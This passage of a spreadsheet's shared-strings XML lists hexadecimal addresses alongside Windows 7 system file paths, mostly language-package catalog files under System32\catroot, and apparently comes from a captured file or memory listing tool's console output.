    <t>~31bf3856ad364e35~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7460e8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf746430</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf746748</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf746888</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf746a60</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf746d78</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf747158</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf747470</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7475b0</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf747788</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf747ac0</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf747dd8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf748258</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf748430</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf748748</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf748a60</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf748c68</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf748e40</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7493c8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7495d0</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7497a8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf749ac0</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf749dd8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf749f18</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74a028</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74a0f8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74a238</t>
  </si>
  <si>
    <t>Windows-Win</t>
  </si>
  <si>
    <t>IP-Pac</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74a410</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74a728</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74a868</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74aba0</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74ad78</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74b3c8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74b6e0</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74b820</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74b9f8</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74bd10</t>
  </si>
  <si>
    <t>ge~31bf3856ad364e35~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74c028</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74c3a8</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74c4e8</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74c6c0</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74c9f8</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74cd10</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74d028</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74d190</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74d368</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74d680</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74d998</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74dba0</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74dd78</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74e300</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74e508</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74e6e0</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74e9f8</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74ed10</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74ee50</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74f148</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74f320</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74f638</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74f778</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74f950</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74fc68</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf74ff80</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7502c0</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7505d8</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7508f0</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf750c08</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf750f80</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf751320</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf751460</t>
  </si>
  <si>
    <t>WinIP-Packa</t>
  </si>
  <si>
    <t>ge~31b</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf751638</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf751950</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf751c68</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf751da8</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf751f80</t>
  </si>
  <si>
    <t>kage~31bf3856ad364e35~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf752278</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf752590</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7526d0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7528a8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf752c68</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf752f80</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf753228</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf753430</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf753608</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf753920</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf753c38</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf753d78</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf753ee8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf754288</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7545a0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7546e0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7548b8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf754bd0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf754ee8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf755248</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf755560</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7556a0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf755878</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf755b90</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf755ee8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf756288</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7563c8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7565a0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7568b8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf756bd0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf756d10</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf756ee8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf757248</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf757560</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7576a0</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf757878</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf757c38</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf757ee8</t>
  </si>
  <si>
    <t>f3856ad364e35~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7581c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Grap</t>
  </si>
  <si>
    <t>hics-Package~</t>
  </si>
  <si>
    <t>x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7583c8</t>
  </si>
  <si>
    <t>x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7585a0</t>
  </si>
  <si>
    <t>x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7588b8</t>
  </si>
  <si>
    <t>x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf758bd0</t>
  </si>
  <si>
    <t>x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf758d10</t>
  </si>
  <si>
    <t>x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf758ee8</t>
  </si>
  <si>
    <t>x86~ar-SA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7591c0</t>
  </si>
  <si>
    <t>x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7594d8</t>
  </si>
  <si>
    <t>x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf759618</t>
  </si>
  <si>
    <t>x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf759950</t>
  </si>
  <si>
    <t>x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf759b28</t>
  </si>
  <si>
    <t>x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf759e40</t>
  </si>
  <si>
    <t>x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75a1e0</t>
  </si>
  <si>
    <t>x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75a320</t>
  </si>
  <si>
    <t>x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75a4f8</t>
  </si>
  <si>
    <t>x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75a638</t>
  </si>
  <si>
    <t>x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75a810</t>
  </si>
  <si>
    <t>x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75ab28</t>
  </si>
  <si>
    <t>x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75aee8</t>
  </si>
  <si>
    <t>x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75b1c0</t>
  </si>
  <si>
    <t>x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75b300</t>
  </si>
  <si>
    <t>x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75b4d8</t>
  </si>
  <si>
    <t>x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75b810</t>
  </si>
  <si>
    <t>x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75bb28</t>
  </si>
  <si>
    <t>x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75be40</t>
  </si>
  <si>
    <t>x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75c1e0</t>
  </si>
  <si>
    <t>x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75c4f8</t>
  </si>
  <si>
    <t>x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75c638</t>
  </si>
  <si>
    <t>x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75c810</t>
  </si>
  <si>
    <t>x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75cbd0</t>
  </si>
  <si>
    <t>x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75cee8</t>
  </si>
  <si>
    <t>x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75d118</t>
  </si>
  <si>
    <t>x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75d320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Mult</t>
  </si>
  <si>
    <t>imedia-Packag</t>
  </si>
  <si>
    <t>0xdf75d4f8</t>
  </si>
  <si>
    <t>x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75d810</t>
  </si>
  <si>
    <t>x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75db28</t>
  </si>
  <si>
    <t>x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75dc68</t>
  </si>
  <si>
    <t>x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75de40</t>
  </si>
  <si>
    <t>x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75e1c0</t>
  </si>
  <si>
    <t>0xdf75e4d8</t>
  </si>
  <si>
    <t>0xdf75e618</t>
  </si>
  <si>
    <t>0xdf75e950</t>
  </si>
  <si>
    <t>0xdf75eb28</t>
  </si>
  <si>
    <t>0xdf75ee40</t>
  </si>
  <si>
    <t>x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf75f118</t>
  </si>
  <si>
    <t>0xdf75f430</t>
  </si>
  <si>
    <t>0xdf75f570</t>
  </si>
  <si>
    <t>0xdf75f748</t>
  </si>
  <si>
    <t>0xdf75fa60</t>
  </si>
  <si>
    <t>0xdf75fe40</t>
  </si>
  <si>
    <t>0xdf75ff80</t>
  </si>
  <si>
    <t>0xdf760190</t>
  </si>
  <si>
    <t>0xdf7602d0</t>
  </si>
  <si>
    <t>0xdf7604a8</t>
  </si>
  <si>
    <t>0xdf7607e0</t>
  </si>
  <si>
    <t>0xdf760af8</t>
  </si>
  <si>
    <t>0xdf760e10</t>
  </si>
  <si>
    <t>0xdf761118</t>
  </si>
  <si>
    <t>0xdf761430</t>
  </si>
  <si>
    <t>0xdf761748</t>
  </si>
  <si>
    <t>0xdf761950</t>
  </si>
  <si>
    <t>0xdf761b28</t>
  </si>
  <si>
    <t>0xdf761e40</t>
  </si>
  <si>
    <t>0xdf762298</t>
  </si>
  <si>
    <t>0xdf762470</t>
  </si>
  <si>
    <t>0xdf762788</t>
  </si>
  <si>
    <t>0xdf762aa0</t>
  </si>
  <si>
    <t>0xdf762be0</t>
  </si>
  <si>
    <t>0xdf762f18</t>
  </si>
  <si>
    <t>0xdf763028</t>
  </si>
  <si>
    <t>0xdf7633a8</t>
  </si>
  <si>
    <t>0xdf7634e8</t>
  </si>
  <si>
    <t>0xdf763820</t>
  </si>
  <si>
    <t>0xdf7639f8</t>
  </si>
  <si>
    <t>0xdf763d10</t>
  </si>
  <si>
    <t>0xdf764028</t>
  </si>
  <si>
    <t>0xdf764190</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Aux-AuxCo</t>
  </si>
  <si>
    <t>mp~31bf3856ad</t>
  </si>
  <si>
    <t>7.6.7600.256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf764368</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows7SP1-KB976933~31bf3856</t>
  </si>
  <si>
    <t>0xdf764680</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\windows-legacy-whql.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf764998</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Prin</t>
  </si>
  <si>
    <t>ting-Package~</t>
  </si>
  <si>
    <t>0xdf764ba0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-ActiveX~3</t>
  </si>
  <si>
    <t>35~x86~~7.6</t>
  </si>
  <si>
    <t>256.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf764d78</t>
  </si>
  <si>
    <t>0xdf765f80</t>
  </si>
  <si>
    <t>0xdf766508</t>
  </si>
  <si>
    <t>0xdf7671c8</t>
  </si>
  <si>
    <t>0xdf767938</t>
  </si>
  <si>
    <t>\Windows\System32\ifmon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf768290</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\localspl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf7685e0</t>
  </si>
  <si>
    <t>\Windows\System32\winmm.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf768a80</t>
  </si>
  <si>
    <t>\Windows\System32\spp\tokens\ppdlic\RasBase-ppdlic.xrm-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf768bf0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tsgqec.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76a228</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\gpsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76ac98</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\srchadmin.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf76b0e0</t>
  </si>
  <si>
